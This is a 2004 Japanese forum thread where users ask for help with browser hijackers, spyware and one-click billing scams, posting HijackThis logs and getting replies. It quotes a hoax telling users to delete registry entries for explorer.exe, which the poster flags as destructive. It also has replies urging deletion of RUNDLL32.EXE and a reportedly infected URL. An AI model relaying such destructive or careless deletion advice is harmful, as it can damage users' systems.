1 :
ひよこ名無しさん :
04/11/17 23:00:00 ID:pjjtpLzL エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
●ブラウザハイジャッカーやウイルスの被害を減らすためにも
WindowsUpdateを利用してこまめにセキュリティパッチを当てましょう
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ まず、テンプレの
>>2-10 あたりを必ず読む。
▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
・ 放置ができない回答者は、質問者が自作自演していると見なされます。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も禁止です。
質問する前に
※スパイウェア除去ウィザードの内容と基本的には同じです。
(1)から順を追って作業して下さい。
1) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
プログラム→WEB設定のリセット
※WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為)
2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
一時ファイル→クッキーの削除+ファイルの削除
3) 削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
4) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
アプリケーションの追加と削除→OS再起動
※コントロールパネルからアンインストールしなければならない主なもの
CnsMin(Jwordとかで使われてるスパイウェア)
http://higaitaisaku.web.infoseek.co.jp/removecnsmin.html その他のコントロールパネルからアンインストールできる主なもの
http://higaitaisaku.web.infoseek.co.jp/uninstallinfo.html ※コントロールパネルからアンインストールしてはならないもの
Home Search Assistant、Shopping Wizard、Search Extender
という名前のものがコントロールパネルのアプリケーションにある場合。
9 :
ひよこ名無しさん :04/11/17 23:18:49 ID:pjjtpLzL
10 :
ひよこ名無しさん :04/11/17 23:20:22 ID:pjjtpLzL
(・3・) エェー
リンク切れまくってるのだが
13 :
豚饅頭 :04/11/17 23:32:41 ID:Vy7wviPH
助けてください。「ひめいちご」というエロサイトに入って、ダウンロードのボタンをクリックしたら、勝手にIP アドレスが登録され18000円の請求がされてしまいました。対処方法はどうしたら宜しいでしょうか?
テンプレサイト閉鎖か。
テンプレサイトはあまり役に立ってない。 あっても無くても一緒。
でもスレの規模が縮小したみたいで少し悲しいね・・・
立てた時間とurlナンバー カコ(゚∀゚)イイ!!
21 :
ひよこ名無しさん :04/11/18 01:01:14 ID:3lxDB17a
22 :
21 :04/11/18 01:22:00 ID:z4ze4XHg
×全スレ ○前スレ
>>21 >>2-9 をやったなら何かしら出てきたんだろ?
とりあえずAd-awareSEとSpybotやってみ。
24 :
豚饅頭 :04/11/18 01:41:29 ID:eMPOo2t7
対処方法ありがとうございました。安心しました。
http://www.porn-news.net/ ホームを上記に書き換えられる+お気に入りに上のページ関連のリンク勝手に追加。
Ad-awareSEとSpybotにウイルスバスターも駆り出してスキャン、テンプレに従い順を踏んでトライし
毎回ホームURLを変更、リンクを削除するも起動のたびに改ざんされる。
Safeモードで駆除後、もう1度Safeで再起動する限りは問題ないが、普通に起動させる都度復活。
【OS】Win98,Updateは事後になってからここ見て実行(手遅れ)。
【ブラウザ/ソフト】IE。/ウイルスバスター常駐。取り憑かれてからAd-awareSEとSpybotも導入。
http://www.hijackthis.de/index.php?langselect=english テンプレでダメならここにログ貼るとの事だが、そのログってAd-awareSE・Spybot・ウイルスバスターの
どれを使うんだろうか? 一番最初に使ってスパイウェアをわらわら検出したのはAd-awareSEだが、
Spybotで2度目にするとも1つ検出。Ad-awareSEの"Logs"フォルダから最新のものと思しき
ログを試しにはっつけてみたら「Unknown」のみが大量に出て、これじゃ間違ってるんではと思い質問。
ちなみにバスターはページ踏んだ瞬間「ウイルス検出、駆除できなかったので隔離しました」が2つ出現、
スキャンしてもそれ以上新たには出なかった。
27 :
ひよこ名無しさん :04/11/18 04:35:04 ID:owGu8XD3
XPです。トロイに4つ感染しました。dawnloader3つとStartPageというものです。 アンチウィルスソフトも持っていませんが何とかできないでしょうか?
28 :
ひよこ名無しさん :04/11/18 04:39:01 ID:XKbmTVEr
2000です。サイトを見ていたらPCがおかしくなりました。 IEやフォルダを開こうとすると、iexploler.exeは〜というエラーが出て、開けません。 最初はデスクトップに「Your PC danger」のような警告が出ていて、 何回もIEを開こうとチャレンジしているうちに真っ白い画面になり、その後いつもの画面に戻りました。 スパイポッドで検索&削除して再起動しましたが、やはり治りません。このような状況は 何が起こっていると考えられるでしょうか? 誘導していただいたためPC初心者868スレとマルチポストに見えますがご了承ください。
最近、このような文書が出回っています。 パソコンのトラブル解消法 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ explorer.exeと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 【※†絶対にやってはいけません!!取り返しの付かない事になります†※】
( -=・=- 3 -=・=- )
お気に入り欄にRelated Searches という宣伝欄が上書きされてしまいます。 Ad-aware、Spy-bot、CWShredderも試しHijackThisでテンプレサイトの怪しい奴は全部消しましたが まだ現われます。どうすればいいでしょうか? 解決法がわからないのでよろしくお願いします。
35 :
たか :04/11/18 11:31:04 ID:oAX/ypYJ
私はwin98を使っているのですが、2のひよこ名無しさんのやり方を試したいのですがIEとは何の略ですか?
36 :
ひよこ名無しさん :04/11/18 11:35:46 ID:VpH2NoSF
>>35 釣り?
Internet Explorerですが、私は釣られましたか?
>>36 ここ見てると、エロサイトで沈没するβακα..._〆(゚▽゚*)多いね。
ほんとにエロは最強だよ。
エロで破滅する香具師、( ゚,_ゝ゚)バカジャネーノ?
>>1 読んで出直しておいで
ラブエロリストは最狂ですよ
, -‐''''"´ ̄``ヽ、 ____ / _ ヽ //´ __,,>、 /  ̄ ̄ { /::/ / ̄:::::::::::::::\ l _ィニニア二二二ニヽ、j._ /::::l/::::::::::::::::::::::::::::::::l | 0Lj/-‐-レノ ノ-‐ヽ:::`ヽ l:::::::::::/l/lノノ/_イ:::::l レ:r、/ ー-、 , -'`|::| l:::::::::/ rtテ、 .ィtq l::::::| l:lヘ ゝ、## ,j '",イノ |::lヘ!j ,;#´ ,j !;:::/ この人、レイプ魔です ヽ i r=、 .メ/' …… レリー 、 ,;# ,...., 彡:lノ/ `.i 、,,_!__,,/ `ヽ、:lヽ、  ̄ /´ _,r┴‐-- v -‐j-、__ , -‐-、_r┴ 、'ー‐ 'i / ̄/:.:.:.:| ̄ ̄`T ̄´|:.:.:.:l´ `ヽ / ヽ ̄`ー、 `ー-、 / ,':.:.:.:.:.l l l:.:.:.l \ _r‐、-、-、r,  ̄ , ヽ |:.:.:.:.:.:.! ! !:.:.l ,. -‐ゝ/// 〉 〉 〉 〉 〉 丶 ! l:.:.:.:.:.:.l | l:.:.:l / 人〈〈〈〈 ' ' ' /っ o l l l:.:.:.:.:.:.! ! l:.:.:.ト/ / ```´-ァ‐'''"ト、 イ | 、__/:.:.:.:.:.:l | |:.:.:ヽヘ l // !7!ヽ, l | /:.:.:.:.:.:.:! l |:.:.:.:.:l `ーヽ、_ノ´l、__ |:::::::::へ/i| '| ____l:.:.:.:.:.:.:.| l |:.:.:.:.:! |_ (l:::::::::::::::::||. l l`ー‐‐'匸二l ̄ ̄l二フーイ /  ̄ `iヘ::∧,、l|:|. |
42 :
26 :04/11/18 15:07:23 ID:zO26RChu
sageだったorz スマソ、目欄は空白でないといけないのね・・・
>>29 に従いlogを貼ってみる。
Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\PCCIOMON.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\TMPROXY.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\PCCPFW.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\SYSTEM\PELMICED.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\PCCGUIDE.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\PCCCLIENT.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\POP3TRAP.EXE
C:\PROGRAM FILES\TREND MICRO\VIRUS BUSTER 2003\TMOAGENT.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\APOINT\APOINT.EXE
C:\PROGRAM FILES\SONY\SMART LABEL\SSLOSERV.EXE
C:\WINDOWS\SURFMONKEY\SMPROXY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\RunDLL.exe
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\APOINT\APWHEEL.EXE
C:\WINDOWS\RUNDLL32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\MY DOCUMENTS\OPENJANE\[JANE].EXE
C:\MY DOCUMENTS\HIJACKTHIS\HIJACKTHIS.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
43 :
26 :04/11/18 15:12:27 ID:zO26RChu
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL O3 - Toolbar: @msdxmLC.dll,-1@1041,ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll O4 - HKLM\..\Run: [internat.exe] internat.exe O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] PELMICED.EXE O4 - HKLM\..\Run: [pccguide.exe] "c:\Program Files\Trend Micro\Virus Buster 2003\pccguide.exe" O4 - HKLM\..\Run: [PCCIOMON.exe] "c:\Program Files\Trend Micro\Virus Buster 2003\PCCIOMON.exe" O4 - HKLM\..\Run: [PCCClient.exe] "c:\Program Files\Trend Micro\Virus Buster 2003\PCCClient.exe" O4 - HKLM\..\Run: [Pop3trap.exe] "c:\Program Files\Trend Micro\Virus Buster 2003\Pop3trap.exe" O4 - HKLM\..\Run: [TM Outbreak Agent] "c:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe" /run O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun O4 - HKLM\..\Run: [SystemTray] SysTray.Exe O4 - HKLM\..\Run: [AlpsPoint] C:\Progra~1\Apoint\Apoint.exe O4 - HKLM\..\Run: [Smart Label OServer] C:\PROGRAM FILES\SONY\SMART LABEL\SSLOSERV.EXE
44 :
26 :04/11/18 15:14:57 ID:zO26RChu
O4 - HKLM\..\Run: [SMProxy] C:\WINDOWS\Surfmonkey\SMProxy.exe O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme O4 - HKLM\..\Run: [MSUpdSrv] msupdsrv.exe O4 - HKLM\..\RunServices: [PCCIOMON.exe] "c:\Program Files\Trend Micro\Virus Buster 2003\PCCIOMON.exe" O4 - HKLM\..\RunServices: [tmproxy] c:\Program Files\Trend Micro\Virus Buster 2003\tmproxy.exe O4 - HKLM\..\RunServices: [PccPfw] c:\Program Files\Trend Micro\Virus Buster 2003\PccPfw.exe O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme O4 - HKCU\..\Run: [Taskbar Display Controls] RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY O4 - Startup: EPSONプリンタウインドウ!3 環境設定(2).lnk O4 - Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE O8 - Extra context menu item: &Google Search - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmsearch.html O8 - Extra context menu item: Cac&hed Snapshot of Page - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmcache.html O8 - Extra context menu item: Si&milar Pages - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmsimilar.html O8 - Extra context menu item: Backward &Links - res://C:\PROGRAM FILES\GOOGLE\GOOGLETOOLBAR1.DLL/cmbacklinks.html O9 - Extra button: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (no file) O12 - Plugin for .wav: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll
----------------- ここまで釣った -----------------
46 :
ひよこ名無しさん :04/11/18 16:21:10 ID:f3HgFMpN
>>46 > マジ返信お願いします。
分かるそれ。
俺も今日昼に起きて家に誰も居ないと思って
パンツ一丁でチンコを出して上下に振りながら
部屋の中を行進していたのを妹に見られた。
すげぇリズミカルにチンコ振っていたんだよね。
>>46 それ、俺も2、3週間前に踏んだ。今、流行ってるから。心配しなくてもいい。無視が一番!
ここ見てると、エロサイトで沈没するβακα..._〆(゚▽゚*)多いね。
ほんとにエロは最強だよ。
エロで破滅する香具師、( ゚,_ゝ゚)バカジャネーノ?
>>1 読んで出直しておいで
52 :
ひよこ名無しさん :04/11/18 17:37:17 ID:730ctQMZ
スパイボットをDLしたのですが常駐プログラムにするには どうしたらよいでしょうか?
キャノンソリューションって無料ソフトだった奴をどんどん有料化してないか?
てすと
57 :
ひよこ名無しさん :04/11/18 18:27:06 ID:owGu8XD3
tp://hyper10.amuser-net.ne.jp/~auto/b3/usr/azumi/brd1/bbs.cgi これ踏んで感染したのですが対処法ありませんか? XPです。
で、俺らにも踏ませる気か?
たかだか60足らずのログも読めないとは。。。
62 :
あき :04/11/18 22:02:45 ID:???
すみません、ドコで聞いていいのか分からなくて教えて欲しいのですが・・。 携帯のアダルトサイトなんですが、普通の動画サイトから飛んでしまって 何のサイトか分からず入場したらアダルトサイトでした・・。 入場しただけなんですが、「登録しました」ってなってしまい、会費の振込みの指定先が 書いてありました・・。 こっちの情報は携帯のキャリアだけなんですが、キャリアからも住所とか使用者の 割り出しはされてしまうのでしょうか・・? 「えぇ!!」思ってすぐ切断したので、ソコのサイトにはもう行くことも出来ません・・。 (リンクリンクでドコから飛んだかワカラナイので・・) 助けてください・・・゚・(ノД`;)・゚・ このまま放置して置いたら住所割り出しで請求が来るのでしょうか・・? 下の方に解約の為のアドレスが掲載されていたのですが、メールしたら大変な事に なりそうで、そのまま切断してしまいました・・。 お願いします(iДi)アゥアゥ
63 :
あき :04/11/18 22:04:45 ID:ITAJpoRx
すみませんsageたらID消えるんでしたね・・。
65 :
ひよこ名無しさん :04/11/18 22:10:59 ID:RI2wtWK6
66 :
あき :04/11/18 22:27:42 ID:ITAJpoRx
>>64 サン
私以外にもあったんですね・・
焦ってしまってログ読まずにすみませんでした・・(>_< ;)
>>65 サン
ありがとうございます!!
読んできました。
キャリアの固体識別じゃ、身元の割り出しが出来ない事や
無視していれば大丈夫と書いてありました。
本当にありがとうございました(iДi)アゥアゥ
70 :
あき :04/11/18 23:21:40 ID:ITAJpoRx
>>67 サン
落ちてるので読めませんでした・・せっかく教えてくれたのにスミマセン(>_< ;)
>>68 サン
300位まで読んで来ました!
コッチの情報は固体識別NOとキャリアしか表示されなかったので連絡も来ないカナ・・?
と思いました。
ワンクリ入会状態だったので、完全無視で大丈夫と書いてあったので安心しました!!
>>66 サン
はい!ありがとうございます(iДi)アゥアゥ
みなさん本当にありがとうございました!!
本当に怖かったのでとても感謝しています・゚・(ノД`;)・゚・
71 :
あき :04/11/18 23:24:03 ID:ITAJpoRx
66→
>>69 サンの間違いです・・
ゴメンナサイ(>_< ;)
裁判所の呼び出しが来たときだけ対応してください それ以外はむっしし
ん〜、ちゃんとお礼を言う良い子にはフォローもちゃんとつくねぇ・・・
(iДi)アゥアゥなんて言ってるやつはどうにでもなれと思うけどな。
76 :
ひよこ名無しさん :04/11/19 00:43:14 ID:KdyOZO2o
Ad-awareSEでスキャンしたあとスパイウェアを除去するには スキャン結果が出た後どうすればいいのでしょうか?
77 :
ひよこ名無しさん :04/11/19 00:43:18 ID:ODUpxUEq
トレンドマイクロのオンラインスキャンを行おうとするとエラーが出るんですが、 スパイウェアかウィルスの影響でこういうことって起こるんですか?
79 :
ひよこ名無しさん :04/11/19 00:50:47 ID:ODUpxUEq
80 :
76 :04/11/19 00:51:35 ID:KdyOZO2o
Critical ObjectsにたくさんVendorが出てきましたが 全てのObjの四角にチェックを入れてQuarantineをクリックすればいいのですか?
81 :
76 :04/11/19 02:30:10 ID:KdyOZO2o
何も分からないのですが無条件に全てのObjの四角にチェックを入れてremoveして大丈夫でしょうか?
>>81 だいじょぶです 全部消しちゃってください
>>42 C:\WINDOWS\RUNDLL32.EXEをごみ箱にポイしてください
ト-、___ ピチピチ _,,-‐‐‐‐‐‐t-:、_ `‐、、_ __,,,-‐'´ .:. ,,:.:``‐、;:;:;ヽ_ ,,,_____,,..、_,,,,,-‐‐‐-、、_,,-'´ ............:.:/: .:. ````ヽ、_ 〈=__,,,,__,,,,,,,,,,,,..::::::::::... ;.:.:.:.:.:.:.:.:.:.:.:.:.:.:,;ノ::. `‐、、 ピチピチ / .._____.. .. . `````ヽ- '--‐‐'''''~~~'`::::ヽ:.:.:..... 、 ヽ、 ヒ;-'´ ````:‐:‐:-:-.:__,,、、、、、 ....:.:.:.:.:.:.`:.:.:.:,;,;,;,;.:.:.;,;...........ヽ、ヽT ◎ ヽ、 ````‐--:-:‐:':´:`:`´:: :::``:..、_:.:.:.:.:.:.:.ヽ、__ ,-==, ````‐‐:-:-:-:-:‐"
87 :
ひよこ名無しさん :04/11/19 11:52:46 ID:flbGq0xD
履歴、クッキーの削除、Ad-awareSE、Spy-bot試しましたが未だに出てくるスパイウェアがあります。 一体どうすれば・・・
パソコン歴およそ7年、遂にやってしまいました! 今さっき、キー坊の上に垂らしてしまいますた・・・。 ネタだけどマジ話です。 助けて〜、イカ臭い人〜!
\________ ______________________/ O モワモワ o / ,' | | ヽ ヽ:::::\ ,' ,' , ,'! /! ! ! ! l ', , ',丶、丶、:::ヽ ! i _/,,,/_/ ! ! ', l! !,', i', ! ! ', ヽヽ`ニ''ー`:::':, ! | ,' /,'/゙ニ', !-'、!,_ノ 、_,','-ィ'l''7'' ,! i ', ヽ `゙゙''ー- ! l! ,' /7'::´( )i゙'' '、', /ィ'''Oi/ ! ,' ! !', ', ./', !', !ilイ´ { i:::::! ! U i / { i:::i | !'l / ,! ,' ! ', ! ,! ∧ !ヽ !! ` i、ー'ノ ! , ' i、ー'ノ ,'/ ; ! / ! ,! !l l`'! 'ヽl (!、| ‐=''"´ '´ ''ー='-イ ! // ,' l , ' リ という夢をみたんだ……… ! ヽ、ヾ! ゙! U ‘ ,' l,イ/ ' ,'イ '、 `ー! lヘ ,--‐ァ U ,. '! l |´| '´!l ', ',ヾ! 、 、_,′ , '´ ! | l ! !! ', ', ', ` 、 , '´ l ,' ! l ,' 'l ', ', ! ` i'´ i/ l l ! |'! ,.ゝ',''! !、 / l !l !'! _,. - '" ヾ 、 __'ヽヽ、 / !!! l !
90 :
76 :04/11/19 14:55:40 ID:KdyOZO2o
Ad-awareSEがスキャン中に「busy」と表示されたまま1時間以上動かないのですが? スキャンにそんなに時間かかることありますか? 途中でやめてしまいました。
>>90 Windowsのシステムがなにかしら不安定なんじゃない?
普通にメンテナンスしているPCならばそういう問題は起きませんよ。
92 :
ひよこ名無しさん :04/11/19 17:29:46 ID:1aEIVi5Q
アダルトサイトにアクセスしただけでこっちの個人情報まで 知られてしまうのでしょうか?
94 :
ひよこ名無しさん :04/11/19 17:55:23 ID:hxLyvcY0
AD Awareを使って検出されたスパイウェアを駆除する場合は 各欄にチェックを入れてnextを押せば良かったですよね? しばらくするとバーにdeleting selectionと出て そのままバーが消えなくなくなり、駆除が正常に出来ないのですが・・・。 やり方はこれで当たってますか?
>>94 当たってますけど、Ad-awareSEも万能じゃ無いっす。
>>95 >>97 なるほど、確実に消そうと思ったらやはりシェアウェアが必要ですか・・・。
レスありがとうございました。
dso exploit というのがスパイポットでも消えません 何か特殊なやり方があるのですか? どうか、御教授お願いします
>>101 Windows Update さえちゃんとしてあれば心配ありません。
修正しなくていいです。(修正しないでください。)
Spybot 1.3 のバグによるものです。
修正はいつになるかわかりません。気にしないこと。
或いは Spybot の「除外」リストに入れてしまう他ありません。
という事でしょうか?
とても、早く答えていただいてありがとうございます
たまに「何故そこまで無知なんだお前は」と思うことがある
104 :
ひよこ名無しさん :04/11/20 01:47:56 ID:87VbcXzB
フォルダを開こうとしても何をしても「エラーログを作成します」と出て、 ちかちかしてからデスクトップに戻る、という現象になってしまいました。 今はサブPCからの書き込みですが、IEももちろん使えません。 このような現象がどういった原因が考えられるのでしょうか?
105 :
ひよこ名無しさん :04/11/20 02:49:53 ID:VXwzV1Qq
こんにちは。助けていただきたく、質問させていただきます。
今回のトラブルが解決したら、エロサイトから足を洗います。
過去ログは、読んできましたが、それでも解決しないので、お手数と存じますが、お願いします。
使用しているのは、Windows XPで、Microsoft Internet Explprerです。
困っているのは、本当にここでは「ありきたり」な現象で、IEを起動するとホーム
ページが設定と別のもが表示される、というものです。ですが、その移り先がエロ
ではなくて、ここです。→res://C:\WINDOWS\System32\shdoclc.dll/navcancl.htm
ここで、インターネットオプションを使い、設定を元のアドレス(Yahoo)にするのですが、
ホームを押したり再起動すると上記のものに成り、
ttp://default.homeこの検索サイト? が表示されます。また、時々エロのサイトが突然画面いっぱいにひとつ表示されます。
Webの設定のリセットを押しても、再起動すると元に(
ttp://default.homeに )戻っています。
スタート→ファイル名を指定して実行→msconfig→スタートアップの過程もやりましたが、
全てのチェックを一度はずしても、PCを再起動すると「AGRSMMSG」などがチェックされた状態に
戻ってしまっています。
原因として考えられるのは、海外のエロサイトを一度クリックして閲覧したところ、その次の
利用からでした。
なお、IEの利用3回に2回はYahooなどのアドレスが「Access Blocked」の状態になり、表示すら
できない状況になります。よく見ると「Virus Warning(英語表記不確か ウィルス警告?)」と書かれています。
無料PCウィルスチェックをしたところ、4つのファイルが「感染」していたようでした。
「StartPage-CQ.gen」とのことですが、駆除の方法がわかりません。というよりか、この
トラブルがこのウィルスによるものかどうかがわかりません。このウィルスは、04年8月8日にアメリカで発生したようで、
「トロイの木馬」と関係があるとの事です。→
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.startpage.f.html 駆除などについても、ホームページトラブルとともにご助言いただ来たいと思います。
よろしくお願いいたします。
>2-9
>>105 書いてあることの解らないところをとばしてやってるから治らないんだよ
(´-`).。oO(セキュリティソフト入れないでよくネットにつなげるよなぁ)
112 :
ひよこ名無しさん :04/11/20 09:50:38 ID:qnmUOPT/
履歴&クッキーの削除、Ad-awareSE、Spy-botやってみたのですが HardcoreTEENSEXと言うのが消せません・・・ ド素人でしてこれ以上何をしたらいいものか・・・ ログ(?)と言うもの一応取ってみたんですけど、何かわかりましたら教えてください。 Logfile of HijackThis v1.98.2 Scan saved at 9:38:49, on 04/11/20 Platform: Windows 98 SE (Win9x 4.10.2222A) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
113 :
続き :04/11/20 09:51:21 ID:qnmUOPT/
Running processes: C:\WINDOWS\SYSTEM\KERNEL32.DLL C:\WINDOWS\SYSTEM\MSGSRV32.EXE C:\WINDOWS\SYSTEM\SPOOL32.EXE C:\WINDOWS\SYSTEM\MPREXE.EXE C:\WINDOWS\SYSTEM\DDHELP.EXE C:\WINDOWS\SYSTEM\mmtask.tsk C:\PROGRAM FILES\COMMON FILES\EPSON\EBAPI\SAGENT2.EXE C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\WEBSCANX.EXE C:\WINDOWS\SYSTEM\MSTASK.EXE C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSHWIN32.EXE C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSSTAT.EXE C:\WINDOWS\SYSTEM\imedpsub.exe C:\WINDOWS\SYSTEM\ATOK9W.EXE C:\WINDOWS\UNPLUG.EXE C:\WINDOWS\EXPLORER.EXE C:\WINDOWS\TASKMON.EXE
114 :
続き :04/11/20 09:51:52 ID:qnmUOPT/
C:\WINDOWS\SYSTEM\SYSTRAY.EXE C:\WINDOWS\SYSTEM\SXGTKBAR.EXE C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\AVCONSOL.EXE C:\MOUSE\SYSTEM\EM_EXEC.EXE C:\WINDOWS\SYSTEM\STIMON.EXE C:\WINDOWS\SYSTEM\INTERNAT.EXE C:\PROGRAM FILES\COMMON FILES\REAL\UPDATE_OB\REALSCHED.EXE C:\WINDOWS\SYSTEM\HOST32.EXE C:\WINDOWS\RunDLL.exe C:\PROGRAM FILES\SONY\VAIO ACTION SETUP\VASERV.EXE C:\PROGRAM FILES\WINDOWS MEDIA COMPONENTS\ENCODER\WMENCAGT.EXE C:\PROGRAM FILES\COMMON FILES\REAL\UPDATE_OB\RNATHCHK.EXE C:\WINDOWS\SYSTEM\WMIEXE.EXE C:\WINDOWS\SYSTEM\RNAAPP.EXE C:\WINDOWS\SYSTEM\TAPISRV.EXE C:\PROGRAM FILES\NTTW\FLETS\APP\ENTERNET.EXE D:\PROGRAM FILES\WINMX354BETA1\WINMX.EXE C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE C:\WINDOWS\デスクトップ\HIJACKTHIS\HIJACKTHIS.EXE
115 :
続き :04/11/20 09:52:58 ID:qnmUOPT/
O2 - BHO: (no name) - {B9B14941-386B-11D9-9D06-000A1E8EF240} - C:\WINDOWS\SYSTEM\IEH.DLL O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHELPER.DLL O2 - BHO: (no name) - {7B55BB05-0B4D-44fd-81A6-B136188F5DEB} - C:\WINDOWS\QUESTMOD.DLL O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX O3 - Toolbar: ReGet Bar - {17939A30-18E2-471E-9D3A-56DD725F1215} - D:\PROGRAM FILES\REGETDX\IEBAR.DLL (file missing) O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe O4 - HKLM\..\Run: [SystemTray] SysTray.Exe O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme O4 - HKLM\..\Run: [SxgTkBar] SxgTkBar.exe O4 - HKLM\..\Run: [AvconsoleEXE] C:\Program Files\Network Associates\McAfee VirusScan\avconsol.exe /minimize O4 - HKLM\..\Run: [VsStatEXE] C:\Program Files\Network Associates\McAfee VirusScan\VSSTAT.EXE /SHOWWARNING O4 - HKLM\..\Run: [EM_EXEC] c:\mouse\system\em_exec.exe O4 - HKLM\..\Run: [StillImageMonitor] C:\WINDOWS\SYSTEM\STIMON.EXE O4 - HKLM\..\Run: [internat.exe] internat.exe O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot O4 - HKLM\..\Run: [McAfeeWebScanX] C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\WebScanX.Exe O4 - HKLM\..\Run: [ControlPanel] C:\WINDOWS\SYSTEM\host32.exe internat.dll,LoadKeyboardProfile O4 - HKLM\..\Run: [Vshwin32EXE] C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSHWIN32.EXE O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
116 :
続き :04/11/20 09:54:25 ID:qnmUOPT/
